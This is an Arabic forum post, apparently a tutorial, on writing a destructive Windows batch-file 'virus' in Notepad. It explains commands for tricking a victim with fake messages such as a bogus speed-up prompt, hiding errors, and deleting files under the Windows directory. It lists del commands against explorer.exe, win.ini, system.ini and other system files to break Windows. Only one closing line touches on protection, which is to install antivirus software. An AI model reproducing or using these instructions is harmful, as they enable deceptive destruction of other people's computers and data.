أولا الفيروس هو مجموعة أوامر تدميرية تعمل تحت أى ظروف وهذا هو الفرق بين الفيروس و الجرثومة فالجرثومة لها وظيفة محددة وفى ظروف محددة
البرامج المستخدمة فى صناعة الفيروسات :
نستطيع صناعة الفيروسات بأبسط برنامج فى الويندوز أوهو Notepad أو المفكرة ولاتتعجب
طريقة حفظ الفيروس بحيث يكون جاهز للعمل
مش هنحفظه بإمتداد txt هنحفظ بإمتداد bat وده يخلى كل الأوامر الى دخلناها فى المفكرة تشتغل على الدوس
والصور توضح
اوكي لما نحب نفتحه ثاني بالنوت باد علشان نعدل فيه شنو نسوي ؟
كليك يمين على الفيروس واختار Edit
أوامر صناعة الفيروسات
@pause
لإيقاف الفيروس حتى يضغط المستخدم أى مفتاح
فإذا وضعنا هذا الأمر فقط فى المفكرة هكذا
وقمنا بالحفظ كما تعلمنا بإمتداد bat
وراح نفتح ملف الدوس
دوس اي شي راح تلاقي الشاشة اختفت
@echo
يعرض كلمات لا دخل لها بالكود تظهر أثناء العرض للضحية
يعنى مثلا نبي نراوغ شوية مع الضحية نقوله نبي نقوله Say Good Bye To Your Computer
فنخليهعلى هذي الصورة @echo Say Good Bye To Your Computer
دلوقتى نحظها فى النوت باد ونحط تحتيها الأمر @pause
يعنى تبقى جذي
ونفتح الدوس
واحد راح يقولي انزين الظحية راح تدوس اي شي ؟ اقوله هذا مثال فقط المفروض هذي بتستخدم كخدع علشان مش يحس انه فيروس يعنى مثلا تقوله لزيادة سرعة جهازك عن طريقة مسح ملفات غير ضرورية اضغط أى مفتاح ... الخ
:exit
لإغلاق شاشة الفيروس تمام وهى غير ضرورية فى الإكس بى و2000 و 2003 علشان الدوس بيقفل اوتوماتيك لما الامر يخلص
إنما ضرورية جداً فى الإصدارات القديمة Me و 98 و 95 علشان الشاشة هتفضل مفتوحة حتى بعد نهاية الكود والضحية هيشوف الأوامر الى اتنفذت عنده
cls
لتنظيف الشاشة من كل الأكواد ومن الأفضل ان تكون دائما فى آخر الكود قبل :exit علشان لو حصل خطأ الضحية ما يعرف شنو اللي صارله
%WinDir%
لتحديد مسار الويندوز
del , deltree
هذول الأوامر الى راح نستخدمها للمتدمير يعنى الفيروس الى راح نسويه راح يخرب الويندوز عن طريق مسح ملفاته
del لمسح ملف مباشر أو مجلد
deltree لمسح كل محتويات مجلد ولكنه به مشكلة أولا وهى (Y/N) يخير بين القبول والرفض وهذا كاف لإيقاف عمل الفيروس
لذا سنستخدم الأمر del للمسح فمثلا سنقوم بعمل ملف تكست على السى باسم 1.txt
ولمسحه سنستخدم هذا الأمر del C:\1.txt
والأفضل ان تضيف بعده :exit
شغل الفيروس ولاحظ الملف هتلاقيه اتمسح
الحين احنا نبي نمسح ملف جوة الويندوز
نروح نعمل ملف تكست زى الى كنا عاملينه فى السى بس المرة دى فى الويندوز ونسميه برضه 1.txt
يبقى الكود المستحدم del %WinDir%\1.txt
نشغل الفيروس ونلاحظ الملف راح تلاقيه انمسح
واحد راح يقولي احنا الحين نقدر نمسح كل ملفات الويندوز مباشرة عن طريق إبدال 1.txt بـ *.*
أقوله لو جربتها الويندوز بيعرف إن حجم التدمير كبير فبيسأل المستخدم متأكد ولا لأ (Y/N)
حتقولى ما احنا كنا بنستخدم الدالة /y فى آخر السطر للموافقة على أى (Y/N)
راح قولك جرب بنفسك ضيف السطر كده
del %WinDir%\*.* /y
هتلاقى العملية مشيت والفيرس انتهى الكود بس الملفات لسه موجودة !!!
دلوقتى أكيد انتم فهمتم الفكرة كلها احنا الحين جوة داخل نقدر نمسح الى نبيه و 90% منها ملفات حساسة يعنى التخريب راح يتم
وهذي بعض الاكواد لإسقاط الويندوز
del %WinDir%\explorer.exe
del %WinDir%\NOTEPAD.EXE
del %WinDir%\ISUninst.exe
del %WinDir%\wjview.exe
del %WinDir%\win.ini
del %WinDir%\system.ini
وطبعا أكيد كلكم عارفين أماكن الملفات الثانية الحساسة
الدرس خلص وان شاء الله بعد ما فهمتم الفكرة هبقى انزل لكم كل يومين كده شوية اكواد مكتوبة جاهزة للفيروسات دى
الحماية والوقاية من هذا النوع من الفيروسات
تحميل برنامج الكاسبر سكاى انتى فيروس فهو من البرامج القلية التى تحدد هذا النوع نت الفيروسات
لاتستطيع وضع مواضيع جديدة في هذا المنتدى لاتستطيع الرد على المواضيع في هذا المنتدى لا تستطيع تعديل مواضيعك في هذا المنتدى لاتستطيع الغاء مواضيعك في هذا المنتدى لاتستطيع التصويت في هذا المنتدى تستطيع ارفاق ملف في هذا المنتدى تستطيع تنزيل ملفات في هذا المنتدى
